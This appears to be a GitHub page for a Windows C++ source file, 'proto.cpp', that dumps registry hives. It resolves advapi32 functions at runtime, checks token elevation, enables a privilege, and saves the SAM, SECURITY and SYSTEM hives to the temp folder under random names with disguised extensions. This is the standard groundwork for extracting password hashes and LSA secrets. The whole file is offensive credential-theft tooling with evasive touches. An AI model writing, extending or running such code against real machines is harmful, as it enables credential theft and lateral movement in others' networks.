-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathproto.cpp
More file actions
93 lines (82 loc) · 2.77 KB
/
proto.cpp
File metadata and controls
93 lines (82 loc) · 2.77 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#include "startproc.h"
#include <Windows.h>
#include <iostream>
#include <chrono>
FARPROC ResolveFunc(const char* lib, const char* func) {
HMODULE hMod = LoadLibraryA(lib);
if (!hMod) {
std::cout << "[-] Failed to load DLL: " << lib
<< ", Error: " << GetLastError() << std::endl;
return nullptr;
}
FARPROC fp = GetProcAddress(hMod, func);
if (!fp) {
std::cout << "[-] Function not found: " << func
<< ", Error: " << GetLastError() << std::endl;
}
return fp;
}
BOOL IsElevated() {
HANDLE hToken = nullptr;
pOpenProcessToken opt = (pOpenProcessToken)ResolveFunc("advapi32.dll", "OpenProcessToken");
if (!opt(GetCurrentProcess(), TOKEN_QUERY, &hToken)) return FALSE;
TOKEN_ELEVATION elev{};
DWORD sz = sizeof(elev);
BOOL elevated = GetTokenInformation(hToken, TokenElevation, &elev, sz, &sz) && elev.TokenIsElevated;
CloseHandle(hToken);
return elevated;
}
int enPrivilege(LPCWSTR privName, HANDLE hToken, LUID lidToCheck) {
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = lidToCheck;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
pAdjustTokenPrivileges pAtp = (pAdjustTokenPrivileges)ResolveFunc("advapi32.dll", "AdjustTokenPrivileges");
if (!pAtp(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
std::cerr << "[-] AdjustTokenPrivileges failed :" << GetLastError() << std::endl;
return 1;
}
std::wcout << L"[+] Privilege Enabled";
return 0;
}
std::wstring a2G(int a = 1000, int b = 9999) {
auto t = std::chrono::steady_clock::now().time_since_epoch().count();
int n = a + (t % (b - a + 1));
std::wstring s;
do {
int d = n % 16;
s = wchar_t(d < 10 ? '0' + d : 'A' + d - 10) + s;
n /= 16;
} while (n);
return s;
}
int hiveDump(LPCWSTR kName) {
pRegOpenKeyExW rok = (pRegOpenKeyExW)ResolveFunc("advapi32.dll", "RegOpenKeyExW");
pRegSaveKeyExW rsk = (pRegSaveKeyExW)ResolveFunc("advapi32.dll", "RegSaveKeyExW");
HKEY hKey;
LSTATUS status = rok(HKEY_LOCAL_MACHINE, kName, REG_OPTION_BACKUP_RESTORE, READ_CONTROL, &hKey);
if (status != ERROR_SUCCESS) {
std::wcerr << L"[!] RegOpenKeyEx failed: " << status << std::endl;
return 1;
}
wchar_t tmpPath[MAX_PATH];
DWORD path = GetTempPathW(MAX_PATH, tmpPath);
std::wstring filePath = tmpPath;
std::wstring nice = a2G();
filePath += nice;
if (kName == L"SAM") {
filePath += L".bam";
}
else if
(kName == L"SECURITY") {
filePath += L".bec";
}
else if (kName == L"SYSTEM") { filePath += L".bsy"; }
LSTATUS status1 = rsk(hKey, filePath.c_str(), NULL, REG_NO_COMPRESSION);
if (status1 != ERROR_SUCCESS) {
std::wcerr << L"[!] RegSaveKeyExW failed: " << status1 << std::endl;
return 1;
}
RegCloseKey(hKey);
return 0;
}